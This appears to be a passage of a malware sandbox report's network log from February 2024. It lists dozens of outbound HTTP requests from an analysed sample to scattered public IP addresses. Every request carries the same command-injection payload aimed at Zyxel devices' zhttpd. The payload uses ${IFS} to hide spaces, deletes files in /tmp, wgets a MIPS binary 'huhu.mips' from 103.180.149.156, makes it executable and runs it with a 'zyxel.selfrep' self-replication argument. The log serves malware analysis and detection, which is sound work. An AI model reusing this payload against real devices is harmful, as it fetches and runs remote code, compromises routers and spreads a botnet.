                                                      Feb 2, 2024 06:35:57.731003046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5593192.168.2.1453174149.211.161.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731029987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5594192.168.2.144453234.26.67.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731060028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5595192.168.2.1443368158.219.44.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731133938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5596192.168.2.144615448.68.182.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731137991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5597192.168.2.145814882.72.213.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731163979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5598192.168.2.1458092210.169.201.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731221914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5599192.168.2.1443524168.215.102.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731264114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5600192.168.2.1457406146.15.68.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731304884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5601192.168.2.1454920191.14.89.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731342077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5602192.168.2.146053450.131.82.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731379986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5603192.168.2.1458604103.36.244.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731400013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5604192.168.2.1443794166.248.165.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731429100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5605192.168.2.143795044.210.234.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731455088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5606192.168.2.1451324147.137.191.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731487036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5607192.168.2.1444024113.209.14.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731534004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5608192.168.2.1450040141.111.81.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731574059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5609192.168.2.145902690.37.245.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731601954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5610192.168.2.143394487.241.142.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731663942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5611192.168.2.1441304167.123.180.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731682062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5612192.168.2.145878696.9.144.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731710911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5613192.168.2.144900625.161.83.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731741905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5614192.168.2.1441008138.80.54.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731805086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5615192.168.2.1447504190.229.73.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731842995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5616192.168.2.1446722168.95.20.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731872082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5617192.168.2.144929687.29.199.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731933117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5618192.168.2.1437182112.141.189.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.731966972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5619192.168.2.1444782204.101.188.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732007027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5620192.168.2.1457740129.121.27.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732039928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5621192.168.2.145216473.127.147.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732089043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5622192.168.2.144868617.77.164.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732125044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5623192.168.2.144937282.47.115.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732146978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5624192.168.2.1459784176.106.206.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732173920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5625192.168.2.1445896197.249.171.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732204914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5626192.168.2.1446896184.200.65.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732255936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5627192.168.2.145020832.105.43.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732299089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5628192.168.2.143648864.106.77.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732352018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5629192.168.2.145607484.35.216.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732373953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5630192.168.2.1439050140.191.237.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732439041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5631192.168.2.14452961.17.234.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732480049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5632192.168.2.1451246197.159.147.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732537985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5633192.168.2.145580849.249.246.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732589960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5634192.168.2.1456240183.8.30.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732624054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5635192.168.2.1441766100.21.192.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732686043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5636192.168.2.143526838.85.34.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732727051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5637192.168.2.146037482.68.174.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732763052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5638192.168.2.144506282.153.193.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732808113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5639192.168.2.145283285.25.81.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732841015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5640192.168.2.1460760125.83.4.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732872009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5641192.168.2.146038457.147.240.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732912064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5642192.168.2.143439676.179.227.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732952118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5643192.168.2.1458266200.64.93.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.732985020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5644192.168.2.143280091.2.200.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733047009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5645192.168.2.1447444166.51.226.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733067989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5646192.168.2.1440338192.185.250.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733115911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5647192.168.2.1444318197.227.154.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733161926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5648192.168.2.144498817.22.131.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733212948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5649192.168.2.145001699.103.233.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733241081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5650192.168.2.1459662168.4.129.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733268976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5651192.168.2.1440788201.101.78.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733299971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5652192.168.2.1445042191.11.124.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733347893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5653192.168.2.1439794180.148.243.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733388901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5654192.168.2.143702053.25.38.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.733421087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5655192.168.2.1441208149.183.201.243443
                                                      TimestampBytes transferredDirectionData
